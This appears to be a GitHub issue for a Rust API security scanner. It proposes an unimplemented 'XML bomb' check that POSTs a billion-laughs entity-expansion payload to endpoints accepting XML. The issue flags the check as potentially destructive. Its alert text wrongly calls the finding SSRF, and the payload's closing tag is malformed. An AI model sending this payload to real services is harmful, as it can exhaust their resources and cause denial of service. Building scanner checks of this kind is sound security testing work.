Open RazMag opened 1 year ago
This is a check suggested by @DeliciousBounty Currently not implemented until testing levels are implemented since it could be destructive
pub async fn check_xml_bomb(&self, auth: &Authorization) -> (CheckRetVal, Vec<Duration>) { let body = format!( r#" <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz "# ); let mut ret_val = CheckRetVal::default(); let mut vec_time = vec![]; // if let Some(content) = &op.request_body{ for oas_map in self.payloads.iter() { for (json_path, schema) in &oas_map.payload.map { // .filter_map(|x| x){ for (m, _operation) in oas_map .path .path_item .get_ops() .iter() .filter(|(m, _)| m == &Method::POST) .filter(|(_method, operation)| { operation .request_body .clone() .unwrap_or_default() .inner(&self.oas_value) .content .into_keys() .collect::<Vec<String>>() .contains(&"application/xml".to_string()) // if let Some(value) = &operation.request_body{ // for ( string_item, Mediatype_item) in &value.inner(&self.oas_value).content { // println!("{:?}", string_item); // if string_item == "application/xml"{ // println!("THere is one least"); // } // ; // } }) .next() // .filter(|(operation)| operation.1.request_body.unwrap().clone().inner(&self.oas_value).content.keys()) { // println!("{:?}", operation); println!("ENCONDING {:?}", &oas_map.path.path); let h = MHeader { name: "Content-type".to_string(), value: "application/xml".to_string(), }; let base_url = self.oas.servers().unwrap().iter().next().unwrap().clone(); let req = AttackRequest::builder() .uri(&base_url.url, &oas_map.path.path) .method(*m) .headers(vec![h]) .payload(&body) .parameters(vec![]) .auth(auth.clone()) .build(); print!("XML BOMB : "); /* let start = Instant::now(); expensive_function(); let duration = start.elapsed(); */ let start = Instant::now(); if let Ok(res) = req.send_request(true).await { //logging request/response/description ret_val.1.push(&req, &res, "Test for XML BOMB".to_string()); ret_val.0.push(( ResponseData { location: oas_map.path.path.clone(), alert_text: format!( "This parameter on the endpoint seems to be vulerable to ssrf.", // json_path[json_path.len() - 1] ), }, res.clone(), )); println!( "{}:{}", "Status".green().bold(), res.status.to_string().magenta() ); } else { println!("REQUEST FAILED"); } vec_time.push(start.elapsed()); } } } (ret_val, vec_time) }
This is a check suggested by @DeliciousBounty Currently not implemented until testing levels are implemented since it could be destructive